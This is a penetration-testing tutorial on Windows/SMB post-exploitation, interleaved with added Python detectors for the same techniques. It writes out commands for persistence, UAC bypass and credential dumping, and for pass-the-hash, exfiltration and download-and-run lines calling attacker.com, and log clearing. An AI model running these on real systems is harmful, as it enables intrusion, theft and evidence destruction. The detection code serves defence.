Phase 4: Maintain Access & Expand

SMB Post-Exploitation

Advanced post-exploitation techniques for SMB environments. Learn to maintain persistent access, escalate privileges, and move laterally through networks.

SMB Post-Exploitation Interface
Persistence Mechanisms
Maintain long-term access through various persistence techniques
Privilege Escalation
Escalate privileges to gain administrative or SYSTEM access
Lateral Movement
Move through the network to compromise additional systems
Persistence Mechanisms
Establish and maintain long-term access to compromised systems

Service-Based Persistence

# Create persistent service (Windows)
sc create "WindowsUpdate" binpath= "C:\Windows\System32\backdoor.exe" start= auto
sc description "WindowsUpdate" "Critical Windows Update Service"
sc start "WindowsUpdate"

# Alternative with PowerShell
New-Service -Name "SystemHealth" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -StartupType Automatic
Start-Service -Name "SystemHealth"

# Verify service creation
sc query "WindowsUpdate"

Services provide reliable persistence as they automatically start with the system and run with elevated privileges.

Scheduled Task Persistence

# Create scheduled task for persistence
schtasks /create /tn "SystemMaintenance" /tr "C:\Windows\System32\backdoor.exe" /sc onstart /ru system

# Daily execution task
schtasks /create /tn "DailyCleanup" /tr "powershell.exe -WindowStyle Hidden -File C:\temp\payload.ps1" /sc daily /st 09:00

# Task triggered by user logon
schtasks /create /tn "UserProfile" /tr "C:\temp\backdoor.exe" /sc onlogon

# List created tasks
schtasks /query /tn "SystemMaintenance"

Scheduled tasks provide flexible persistence options with various trigger conditions and execution contexts.

Registry-Based Persistence

# Registry Run key persistence
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "C:\Windows\System32\backdoor.exe"

# User-specific persistence
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "UserAgent" /t REG_SZ /d "C:\Users\Public\agent.exe"

# Service registry modification
reg add "HKLM\SYSTEM\CurrentControlSet\Services\Backdoor" /v "ImagePath" /t REG_EXPAND_SZ /d "C:\Windows\System32\backdoor.exe"

Registry persistence is stealthy and survives reboots, making it ideal for long-term access.
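Each of the three persistence routes above leaves a record on the host: a service install writes System event 7045, a scheduled task creation writes Security event 4698 (with task-creation auditing on), and a change to a Run key writes Security event 4657 (with object access auditing on the key). The following Python is an added example, not code from the original page or from any tool it names; it runs a small rule set over constructed records of those three kinds. Field names follow the Windows event schema, KNOWN_SERVICES is an assumed per-host baseline, and the 4698 record here carries the task action in a flattened "Command" field (in a real record it is inside the TaskContent XML).

```python
"""Triage persistence artefacts in Windows event records.

Added example, not code from the original page or from any tool it names.
Applies a small rule set to constructed System 7045, Security 4698 and
Security 4657 records. KNOWN_SERVICES is an assumed baseline.
"""
import re

# Locations a standard user can write to; an autostart binary there is a red flag.
USER_WRITABLE = re.compile(r"\\(temp|users\\public|appdata|programdata)\\", re.I)
# Autostart keys whose values should only change during known deployments.
RUN_KEYS = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(once)?$", re.I)
# Hidden-window or encoded PowerShell used as a task action.
HIDDEN_PS = re.compile(r"powershell(\.exe)?\s.*(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\s)", re.I)
# Assumed baseline: services present in a clean inventory of this host.
KNOWN_SERVICES = {"Spooler", "WinDefend", "wuauserv", "EventLog"}


def check_event(ev):
    """Return a list of (severity, reason) findings for one event record."""
    findings = []
    eid = ev["EventID"]
    if eid == 7045:
        if ev["ServiceName"] not in KNOWN_SERVICES:
            findings.append(("medium", f"new service '{ev['ServiceName']}' -> {ev['ImagePath']}"))
        if USER_WRITABLE.search(ev["ImagePath"]):
            findings.append(("high", f"service '{ev['ServiceName']}' runs from a user-writable path"))
    elif eid == 4698:
        if HIDDEN_PS.search(ev["Command"]):
            findings.append(("high", f"task '{ev['TaskName']}' runs hidden/encoded PowerShell"))
        if USER_WRITABLE.search(ev["Command"]):
            findings.append(("high", f"task '{ev['TaskName']}' runs a file from a user-writable path"))
    elif eid == 4657 and RUN_KEYS.search(ev["ObjectName"]):
        findings.append(("high", f"Run key value '{ev['ObjectValueName']}' set to {ev['NewValue']}"))
    return findings


def scan(events):
    """Apply check_event to every record; returns (host, event id, severity, reason) tuples."""
    return [(ev["Computer"], ev["EventID"], sev, reason)
            for ev in events for sev, reason in check_event(ev)]


# Constructed sample records mirroring the commands in this section.
SAMPLE_EVENTS = [
    {"Computer": "WS01", "EventID": 7045, "ServiceName": "WindowsUpdate",
     "ImagePath": r"C:\Windows\System32\backdoor.exe", "StartType": "auto start"},
    {"Computer": "WS01", "EventID": 7045, "ServiceName": "SystemHealth",
     "ImagePath": r"C:\Windows\Temp\backdoor.exe", "StartType": "auto start"},
    {"Computer": "WS01", "EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe", "StartType": "auto start"},
    {"Computer": "WS01", "EventID": 4698, "TaskName": r"\DailyCleanup",
     "Command": r"powershell.exe -WindowStyle Hidden -File C:\temp\payload.ps1"},
    {"Computer": "WS01", "EventID": 4657, "ObjectValueName": "SecurityUpdate",
     "ObjectName": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "NewValue": r"C:\Windows\System32\backdoor.exe"},
    {"Computer": "WS01", "EventID": 4657, "ObjectValueName": "ShowFrequent",
     "ObjectName": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer",
     "NewValue": "1"},
]

if __name__ == "__main__":
    for host, eid, sev, reason in scan(SAMPLE_EVENTS):
        print(f"[{sev:6}] {host} {eid}: {reason}")
```

The "WindowsUpdate" service from the first command only trips the baseline rule because its binary sits in System32, which is why a service inventory baseline matters more than path heuristics alone; the Temp-based service and the hidden PowerShell task are caught by the path and command rules without any baseline.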

Privilege Escalation Techniques
Escalate from limited user access to administrative or SYSTEM privileges

Token Impersonation

# Meterpreter token impersonation
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"

# Alternative with PowerShell
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"

# Check current privileges
meterpreter > getuid
whoami /priv

Token impersonation allows assuming the security context of other users or system accounts.

Unquoted Service Path Exploitation

# Find unquoted service paths (auto-start services outside C:\Windows whose path is not quoted)
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# Check directory permissions
icacls "C:\Program Files\Vulnerable Service"

# Place malicious executable
copy backdoor.exe "C:\Program Files\Vulnerable.exe"

# Restart service to trigger execution
sc stop "VulnerableService"
sc start "VulnerableService"

Unquoted service paths can be exploited when a service's binary path contains spaces and is not enclosed in quotes: the service control manager tries each space-delimited prefix of the path as an executable before reaching the real binary.
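The wmic one-liner above lists candidate services but leaves the reader to work out which file names Windows would actually try first, and therefore which directories must not be writable by standard users. The following Python is an added example, not code from the original page or from any tool it names; given service records in the shape of the wmic output (Name, PathName, StartMode), it reports every unquoted path containing spaces together with the intermediate file names the service control manager would try before the real binary. The sample service table is constructed.

```python
"""Audit service binary paths for the unquoted-path weakness.

Added example, not from the original page or any tool it names. Reports the
intermediate file names Windows would try for each unquoted path with spaces;
their parent directories are the ones to lock down.
"""
import re


def executable_part(path_name):
    """Drop arguments: keep the command up to and including the first '.exe'."""
    m = re.match(r"(.*?\.exe)", path_name, re.I)
    return m.group(1) if m else path_name


def hijack_candidates(path_name):
    """File names the service control manager tries before the real binary.
    Returns [] when the path is quoted or contains no spaces."""
    p = path_name.strip()
    if p.startswith('"'):
        return []                      # quoted path: only one interpretation
    exe = executable_part(p)
    if " " not in exe:
        return []                      # no spaces: nothing to misparse
    parts = exe.split(" ")
    # Every prefix that ends at a space is tried as "<prefix>.exe" first.
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def audit(services, start_modes=("auto",)):
    """services: iterable of (Name, PathName, StartMode) rows. Returns a list of
    (Name, PathName, candidates) for services in start_modes that are exposed."""
    findings = []
    for name, path_name, start_mode in services:
        if start_mode.lower() not in start_modes:
            continue
        candidates = hijack_candidates(path_name)
        if candidates:
            findings.append((name, path_name, candidates))
    return findings


# Constructed sample in the shape of `wmic service get name,pathname,startmode`.
SAMPLE_SERVICES = [
    ("Spooler", r"C:\Windows\System32\spoolsv.exe", "Auto"),
    ("VulnerableService", r"C:\Program Files\Vulnerable Service\service.exe", "Auto"),
    ("SafeApp", r'"C:\Program Files\Safe App\safe.exe" -service', "Auto"),
    ("ManualSvc", r"C:\Program Files\Manual Svc\manual.exe", "Manual"),
]

if __name__ == "__main__":
    for name, path_name, candidates in audit(SAMPLE_SERVICES):
        print(f"{name}: {path_name}")
        for c in candidates:
            print(f"    would be tried first: {c}")
```

The check goes beyond the page's single example: a path such as `C:\Program Files (x86)\App\app.exe` yields `C:\Program.exe` and `C:\Program Files.exe`, so the root of the drive and the parent of the install directory are the ACLs to verify with icacls. The fix is to quote the path in the service configuration, for example `sc config VulnerableService binPath= "\"C:\Program Files\Vulnerable Service\service.exe\""`, and the one-liner's exclusion of `C:\Windows` is only noise reduction, not a safety guarantee.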

Weak Service Permissions

# Check service permissions with accesschk
accesschk.exe -uwcqv "Authenticated Users" * | findstr /i "service"

# Check specific service permissions
accesschk.exe -ucqv "VulnerableService"

# Modify service binary path
sc config "VulnerableService" binpath= "C:\Windows\System32\backdoor.exe"

# Restart service
sc stop "VulnerableService"
sc start "VulnerableService"

Services with weak permissions allow modification of their configuration or binary paths.

UAC Bypass Techniques

# UAC bypass with fodhelper
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v "DelegateExecute" /t REG_SZ
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /ve /d "C:\Windows\System32\cmd.exe" /t REG_SZ
fodhelper.exe

# UAC bypass with eventvwr
reg add "HKCU\Software\Classes\mscfile\shell\open\command" /ve /d "C:\Windows\System32\cmd.exe" /t REG_SZ
eventvwr.exe

UAC bypass techniques exploit trusted Windows binaries to execute code with elevated privileges.
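Both bypasses above depend on two observable steps: a shell handler key is planted under the user's hive where it normally does not exist, and an auto-elevating binary then spawns a child it never spawns in normal use. The following Python is an added example, not code from the original page or from Sysmon; it applies those two rules to constructed Sysmon records (event 13, registry value set, and event 1, process create). EXPECTED_CHILDREN is an assumed baseline of what fodhelper.exe and eventvwr.exe legitimately launch, and the SID in the sample paths is constructed.

```python
"""Detect the UAC-bypass pattern from Sysmon events.

Added example, not code from the original page or from Sysmon itself.
Rule 1: Sysmon 13 on the ms-settings / mscfile shell handler keys under HKU.
Rule 2: Sysmon 1 where an auto-elevating binary spawns an unexpected child.
EXPECTED_CHILDREN is an assumed baseline.
"""
import ntpath
import re

# Shell handler keys under a user hive that the bypasses above plant.
UAC_KEYS = re.compile(r"\\classes\\(ms-settings|mscfile)\\shell\\open\\command", re.I)
# Auto-elevating binaries and the children they legitimately spawn (assumed).
EXPECTED_CHILDREN = {"fodhelper.exe": set(), "eventvwr.exe": {"mmc.exe"}}


def check_event(ev):
    """Return (severity, reason) findings for one Sysmon record."""
    findings = []
    if ev["EventID"] == 13 and UAC_KEYS.search(ev["TargetObject"]):
        findings.append(("high", f"{ev['Image']} set {ev['TargetObject']} = {ev['Details']!r}"))
    elif ev["EventID"] == 1:
        parent = ntpath.basename(ev["ParentImage"]).lower()
        child = ntpath.basename(ev["Image"]).lower()
        if parent in EXPECTED_CHILDREN and child not in EXPECTED_CHILDREN[parent]:
            findings.append(("high", f"{parent} spawned {child} at {ev['IntegrityLevel']} integrity"))
    return findings


def scan(events):
    """Apply check_event to every record; returns (host, severity, reason) tuples."""
    return [(ev["Computer"], sev, reason) for ev in events for sev, reason in check_event(ev)]


HIVE = r"HKU\S-1-5-21-1111-2222-3333-1001"   # constructed user hive path
SAMPLE_EVENTS = [
    {"Computer": "WS01", "EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": HIVE + r"\Software\Classes\ms-settings\Shell\Open\command\DelegateExecute",
     "Details": ""},
    {"Computer": "WS01", "EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": HIVE + r"\Software\Classes\ms-settings\Shell\Open\command\(Default)",
     "Details": r"C:\Windows\System32\cmd.exe"},
    {"Computer": "WS01", "EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": HIVE + r"\Software\Classes\.txt\(Default)", "Details": "txtfile"},
    {"Computer": "WS01", "EventID": 1, "ParentImage": r"C:\Windows\System32\fodhelper.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "IntegrityLevel": "High"},
    {"Computer": "WS01", "EventID": 1, "ParentImage": r"C:\Windows\System32\eventvwr.exe",
     "Image": r"C:\Windows\System32\mmc.exe", "IntegrityLevel": "High"},
    {"Computer": "WS01", "EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "IntegrityLevel": "Medium"},
]

if __name__ == "__main__":
    for host, sev, reason in scan(SAMPLE_EVENTS):
        print(f"[{sev}] {host}: {reason}")
```

The registry rule fires on the write itself, before the elevated process exists, so it gives the earliest signal; the process-lineage rule is the backstop for variants that use a different handler key. Neither rule depends on the payload being cmd.exe.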

Lateral Movement Techniques
Move through the network to compromise additional systems and expand access

Pass-the-Hash Lateral Movement

# Extract hashes with Mimikatz
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

# Pass-the-hash with CrackMapExec
crackmapexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76

# Execute commands on remote systems
crackmapexec smb 192.168.1.100 -u administrator -H <hash> -x "whoami"

# Dump additional credentials
crackmapexec smb 192.168.1.100 -u administrator -H <hash> --sam

Pass-the-hash allows authentication to other systems using captured NTLM hashes without plaintext passwords.

PSExec and Remote Execution

# PSExec with valid credentials
psexec.py domain/username:password@192.168.1.100

# PSExec with hash authentication
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 administrator@192.168.1.100

# WMI execution
wmiexec.py domain/username:password@192.168.1.100

# SMB execution
smbexec.py domain/username:password@192.168.1.100

Remote execution tools provide interactive shells on target systems through various protocols.

WinRM and PowerShell Remoting

# PowerShell remoting session
$cred = Get-Credential
Enter-PSSession -ComputerName 192.168.1.100 -Credential $cred

# Execute commands remotely
Invoke-Command -ComputerName 192.168.1.100 -Credential $cred -ScriptBlock {whoami}

# WinRM with evil-winrm
evil-winrm -i 192.168.1.100 -u administrator -p password

# WinRM with hash
evil-winrm -i 192.168.1.100 -u administrator -H <hash>

WinRM provides legitimate remote management capabilities that can be leveraged for lateral movement.
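Whichever of the three methods above is used, the target host records a network logon (Security 4624, LogonType 3); for pass-the-hash the AuthenticationPackageName is NTLM, and a subnet sweep like the CrackMapExec command produces many such logons from one source in seconds. The following Python is an added example, not code from the original page or from any tool it names; it reads constructed 4624 records and reports any account/source pair that authenticates to many distinct computers inside a sliding window. The window and host thresholds are assumed values to tune per environment.

```python
"""Spot NTLM logon fan-out, the footprint of a pass-the-hash sweep.

Added example, not code from the original page or from any tool it names.
Reads constructed Security 4624 records and flags an account/source pair
that reaches min_hosts distinct computers within window_seconds.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def detect_fanout(events, window_seconds=60, min_hosts=5):
    """Return one finding per (account, source IP) that fans out too fast."""
    by_key = defaultdict(list)
    for ev in events:
        if ev["EventID"] != 4624 or ev["LogonType"] != 3:
            continue
        if ev["AuthenticationPackageName"].upper() != "NTLM":
            continue                     # Kerberos logons are not the PtH footprint
        key = (ev["TargetUserName"].lower(), ev["IpAddress"])
        by_key[key].append((datetime.fromisoformat(ev["TimeCreated"]), ev["Computer"]))

    window = timedelta(seconds=window_seconds)
    findings = []
    for (user, source), logons in by_key.items():
        logons.sort()
        best = None
        for i, (start, _) in enumerate(logons):
            # Distinct targets reached within the window opening at this logon.
            hosts = {host for t, host in logons[i:] if t - start <= window}
            if len(hosts) >= min_hosts and (best is None or len(hosts) > best["distinct_hosts"]):
                best = {"user": user, "source": source, "distinct_hosts": len(hosts),
                        "window_start": start.isoformat()}
        if best:
            findings.append(best)
    return findings


def _logon(ts, host, user, ip, pkg="NTLM", logon_type=3):
    """Constructed 4624 record carrying only the fields the detector reads."""
    return {"EventID": 4624, "TimeCreated": ts, "Computer": host, "TargetUserName": user,
            "LogonType": logon_type, "AuthenticationPackageName": pkg, "IpAddress": ip}


# Constructed sample: one source sweeps twelve hosts in 22 seconds over NTLM,
# an administrator does routine work on two servers, and one Kerberos logon.
SAMPLE_EVENTS = (
    [_logon(f"2024-05-01T09:00:{i * 2:02d}", f"WS{i:02d}", "administrator", "10.0.0.5")
     for i in range(1, 13)]
    + [_logon("2024-05-01T08:00:00", "SRV01", "jsmith", "10.0.0.9"),
       _logon("2024-05-01T08:10:00", "SRV02", "jsmith", "10.0.0.9"),
       _logon("2024-05-01T09:00:30", "DC01", "administrator", "10.0.0.5", pkg="Kerberos")]
)

if __name__ == "__main__":
    for f in detect_fanout(SAMPLE_EVENTS):
        print(f"{f['user']} from {f['source']}: {f['distinct_hosts']} hosts from {f['window_start']}")
```

Fan-out is the signal that survives credential changes: it does not matter whether the attacker held a password or only a hash. The psexec.py and evil-winrm paths leave additional records worth pairing with this one (a PSEXESVC service install as System 7045, and WinRM logons arriving on the WS-Management listener), but the logon fan-out alone already separates a sweep from an administrator working on a couple of servers.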

Data Exfiltration Techniques
Extract sensitive data and credentials from compromised systems

Credential Dumping

# Dump SAM database
reg save HKLM\SAM C:\temp\sam.hive
reg save HKLM\SYSTEM C:\temp\system.hive

# Extract hashes with secretsdump
secretsdump.py -sam sam.hive -system system.hive LOCAL

# Dump LSASS memory with Mimikatz
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

# Alternative LSASS dump
procdump.exe -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"

Credential dumping extracts stored passwords and hashes for further lateral movement.

File System Access and Exfiltration

# Search for sensitive files
dir /s /b C:\ | findstr /i "password"
dir /s /b C:\ | findstr /i "config"

# Download files via SMB
smbget -R smb://192.168.1.100/C$/Users/ -U administrator

# Compress and exfiltrate data
powershell Compress-Archive -Path "C:\Sensitive\*" -DestinationPath "C:\temp\data.zip"

# Exfiltrate via HTTP
powershell Invoke-WebRequest -Uri "http://attacker.com/upload" -Method POST -InFile "C:\temp\data.zip"

Systematic file system access allows identification and exfiltration of sensitive business data.

Active Directory Enumeration

# Domain enumeration with PowerView
Get-Domain
Get-DomainUser | Select-Object name,description
Get-DomainGroup | Select-Object name,description

# BloodHound data collection
SharpHound.exe -c All

# LDAP enumeration
ldapsearch -x -H ldap://dc.domain.com -D "domain\\user" -W -b "dc=domain,dc=com"

# Export domain data
crackmapexec ldap dc.domain.com -u username -p password --users
crackmapexec ldap dc.domain.com -u username -p password --groups

Active Directory enumeration reveals domain structure, users, groups, and potential attack paths.

Covering Tracks & Stealth
Maintain stealth and avoid detection during post-exploitation activities

Log Manipulation

# Clear Windows event logs
wevtutil cl System
wevtutil cl Security
wevtutil cl Application

# Clear specific log entries (note: Remove-WinEvent is not a built-in cmdlet and Windows
# provides no supported way to delete individual records; only whole logs can be cleared)
Get-WinEvent -FilterHashtable @{LogName="Security"; ID=4624} | Remove-WinEvent

# Disable logging temporarily
auditpol /set /category:"Logon/Logoff" /success:disable /failure:disable

# Clear command history
Clear-History
Remove-Item (Get-PSReadlineOption).HistorySavePath

Log manipulation helps avoid detection by removing evidence of malicious activities.
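Clearing a log is itself logged: `wevtutil cl Security` leaves Security event 1102 as the first record of the fresh log, clearing another channel writes System event 104, and an auditpol change writes Security 4719. Disabling a category produces no record of its own, but it shows up as a host that stops emitting the events it used to emit. The following Python is an added example, not code from the original page; it runs over constructed event records (fields follow the Windows event schema) and reports those three event IDs plus any stretch longer than max_gap_minutes during which a host emits no Security events. The gap threshold is an assumed value.

```python
"""Surface log clearing, audit-policy changes and audit silence.

Added example, not code from the original page. Flags Security 1102,
System 104 and Security 4719, and any per-host gap in Security events
longer than max_gap_minutes. Threshold is assumed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

TAMPER_EVENTS = {
    (1102, "Security"): "Security log cleared",
    (104, "System"): "System log cleared",
    (4719, "Security"): "audit policy changed",
}


def detect_tampering(events, max_gap_minutes=30):
    """Return findings as dicts with host, time, actor and reason."""
    findings = []
    security_times = defaultdict(list)
    for ev in events:
        t = datetime.fromisoformat(ev["TimeCreated"])
        if ev["Channel"] == "Security":
            security_times[ev["Computer"]].append(t)
        label = TAMPER_EVENTS.get((ev["EventID"], ev["Channel"]))
        if label:
            findings.append({"host": ev["Computer"], "time": ev["TimeCreated"],
                             "actor": ev.get("SubjectUserName", "?"), "reason": label})

    # Silence check: a host whose Security events simply stop for a while.
    gap = timedelta(minutes=max_gap_minutes)
    for host, times in security_times.items():
        times.sort()
        for earlier, later in zip(times, times[1:]):
            if later - earlier > gap:
                minutes = int((later - earlier).total_seconds() // 60)
                findings.append({"host": host, "time": earlier.isoformat(), "actor": "n/a",
                                 "reason": f"no Security events for {minutes} min"})
    return findings


def _ev(ts, host, channel, eid, **extra):
    """Constructed event record with the fields the detector reads."""
    rec = {"TimeCreated": ts, "Computer": host, "Channel": channel, "EventID": eid}
    rec.update(extra)
    return rec


# Constructed sample: WS01 is cleared, its audit policy changed, then it goes
# quiet for 43 minutes; WS02 logs steadily and should produce nothing.
SAMPLE_EVENTS = [
    _ev("2024-05-01T09:00:00", "WS01", "Security", 4624),
    _ev("2024-05-01T09:05:00", "WS01", "Security", 4688),
    _ev("2024-05-01T09:06:00", "WS01", "Security", 1102, SubjectUserName="administrator"),
    _ev("2024-05-01T09:06:05", "WS01", "System", 104, SubjectUserName="administrator"),
    _ev("2024-05-01T09:07:00", "WS01", "Security", 4719, SubjectUserName="administrator"),
    _ev("2024-05-01T09:50:00", "WS01", "Security", 4624),
    _ev("2024-05-01T09:00:00", "WS02", "Security", 4624),
    _ev("2024-05-01T09:10:00", "WS02", "Security", 4688),
    _ev("2024-05-01T09:20:00", "WS02", "Security", 4624),
]

if __name__ == "__main__":
    for f in detect_tampering(SAMPLE_EVENTS):
        print(f"{f['host']} {f['time']} ({f['actor']}): {f['reason']}")
```

These rules only work if the records leave the host before they can be cleared, which is the practical argument for forwarding Security and System channels to a collector rather than relying on the local log. The silence check needs a baseline of expected event volume; the fixed threshold here is a stand-in for that.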

Timestomping and File Manipulation

# Modify file timestamps
meterpreter > timestomp C:\\backdoor.exe -f C:\\Windows\\System32\\calc.exe

# PowerShell timestamp modification
(Get-Item "C:\backdoor.exe").CreationTime = "01/01/2020 12:00:00"
(Get-Item "C:\backdoor.exe").LastWriteTime = "01/01/2020 12:00:00"

# Hide files with attributes
attrib +h +s C:\backdoor.exe

# Create alternate data streams
echo "malicious content" > C:\legitimate.txt:hidden.exe

File manipulation techniques help blend malicious files with legitimate system files.

Process and Memory Evasion

# Migrate into a legitimate process (Meterpreter process migration; this is not process hollowing)
meterpreter > migrate <legitimate_process_pid>

# In-memory execution
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://attacker.com/payload.ps1'))"

# Reflective DLL injection (run from within the Meterpreter session)
meterpreter > run post/windows/manage/reflective_dll_inject

# Living off the land techniques
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://attacker.com/payload.sct")

Memory-based execution and process manipulation help avoid file-based detection mechanisms.
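The in-memory techniques above avoid dropping files, but every one of them still starts a process with a distinctive command line, and the credential-dumping and exfiltration commands in the earlier sections do too (procdump against lsass, reg save of a hive, Invoke-WebRequest with an upload body). With command-line auditing enabled those land in Security 4688, and a handle opened on lsass.exe lands in Sysmon event 10 regardless of the tool. The following Python is an added example, not code from the original page or from any tool it names; it covers the Credential Dumping, File System Access and Exfiltration, and Process and Memory Evasion sections in one rule set over constructed 4688 and Sysmon 10 records. The regexes run on a lowercased, whitespace-collapsed copy of the command line, and LSASS_READERS is an assumed allowlist of processes that legitimately read lsass.exe.

```python
"""Command-line and LSASS-access rules for the tradecraft on this page.

Added example, not from the original page or any tool it names. Inputs are
constructed Security 4688 records (command-line auditing on) and Sysmon
event 10 ProcessAccess records. LSASS_READERS is an assumed allowlist.
"""
import ntpath
import re

# (label, pattern) applied to a normalised command line.
CMDLINE_RULES = [
    ("mimikatz sekurlsa module", r"sekurlsa::"),
    ("LSASS minidump via procdump", r"procdump(64)?(\.exe)?\s.*-ma\s+lsass"),
    ("registry hive export", r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b"),
    ("HTTP file upload", r"invoke-webrequest.*(-infile|-body)\b"),
    ("PowerShell download cradle",
     r"(new-object\s+net\.webclient|downloadstring|downloadfile|\biex\b|invoke-expression)"),
    ("hidden PowerShell window", r"-w(indowstyle)?\s+hidden"),
    ("rundll32 javascript: handler", r"rundll32(\.exe)?\s+javascript:"),
]
# Processes that legitimately open LSASS with read access (assumed allowlist).
LSASS_READERS = {"msmpeng.exe", "csrss.exe", "wininit.exe", "services.exe", "lsm.exe"}
PROCESS_VM_READ = 0x10   # access bit needed to read LSASS memory


def normalise(cmd):
    """Lowercase and collapse whitespace so spacing tricks do not evade the regexes."""
    return " ".join(cmd.split()).lower()


def check_event(ev):
    """Return (label, detail) findings for one record."""
    findings = []
    if ev["EventID"] == 4688:
        cmd = normalise(ev["CommandLine"])
        for label, pattern in CMDLINE_RULES:
            if re.search(pattern, cmd):
                findings.append((label, ev["CommandLine"]))
    elif ev["EventID"] == 10 and ntpath.basename(ev["TargetImage"]).lower() == "lsass.exe":
        source = ntpath.basename(ev["SourceImage"]).lower()
        if source not in LSASS_READERS and int(ev["GrantedAccess"], 16) & PROCESS_VM_READ:
            findings.append(("non-allowlisted LSASS read", ev["SourceImage"]))
    return findings


def scan(events):
    """Apply check_event to every record; returns (host, label, detail) tuples."""
    return [(ev["Computer"], label, detail) for ev in events for label, detail in check_event(ev)]


def _proc(cmd):
    """Constructed 4688 record carrying only the command line."""
    return {"Computer": "WS01", "EventID": 4688, "CommandLine": cmd}


# Constructed sample records; hosts use the reserved example.invalid domain.
SAMPLE_EVENTS = [
    _proc('mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"'),
    _proc("procdump.exe -ma lsass.exe lsass.dmp"),
    _proc(r"reg save HKLM\SAM C:\temp\sam.hive"),
    _proc(r'powershell Invoke-WebRequest -Uri "http://example.invalid/upload" -Method POST -InFile "C:\temp\data.zip"'),
    _proc("powershell -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://example.invalid/p.ps1'))\""),
    _proc(r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://example.invalid/p.sct")'),
    _proc(r"notepad.exe C:\Users\bob\notes.txt"),
    {"Computer": "WS01", "EventID": 10, "SourceImage": r"C:\Users\bob\procdump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"Computer": "WS01", "EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
]

if __name__ == "__main__":
    for host, label, detail in scan(SAMPLE_EVENTS):
        print(f"{host}: {label}: {detail}")
```

The download cradle in the sample trips two rules (cradle and hidden window), which is the intended behaviour: each rule is a separate, explainable reason. The Sysmon 10 rule is the one that survives a renamed or custom dumper, since it keys on the target process and the access mask rather than on the tool's name.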

Essential Tools

Metasploit (framework): post-exploitation modules and Meterpreter
CrackMapExec (lateral movement): lateral movement and credential dumping
Mimikatz (credential theft): credential extraction and manipulation
BloodHound (reconnaissance): Active Directory attack path analysis
PowerShell Empire (framework): PowerShell-based post-exploitation framework
Cobalt Strike (commercial): commercial adversary simulation platform

Additional Resources

MITRE ATT&CK: framework for understanding adversary tactics
OWASP Testing Guide: comprehensive security testing methodology
Tenable Solutions: professional vulnerability management

SMB Penetration Testing Learning Path
Comprehensive SMB security assessment methodology from reconnaissance to post-exploitation

Beginner: SMB Protocol Fundamentals. Master SMB/CIFS protocol architecture, versions, and security mechanisms
Intermediate: SMB Reconnaissance & Enumeration. Learn SMB enumeration techniques, null session testing, and share discovery
Intermediate: SMB Vulnerability Analysis. Identify SMB security vulnerabilities and assess enterprise Windows security
Advanced: SMB Exploitation Techniques. Master EternalBlue, SMBGhost, and advanced SMB attack methodologies
Advanced: SMB Post-Exploitation (this page). Learn persistence, lateral movement, and privilege escalation in SMB environments
Reference: SMB CVE Database. Research critical SMB vulnerabilities and exploitation techniques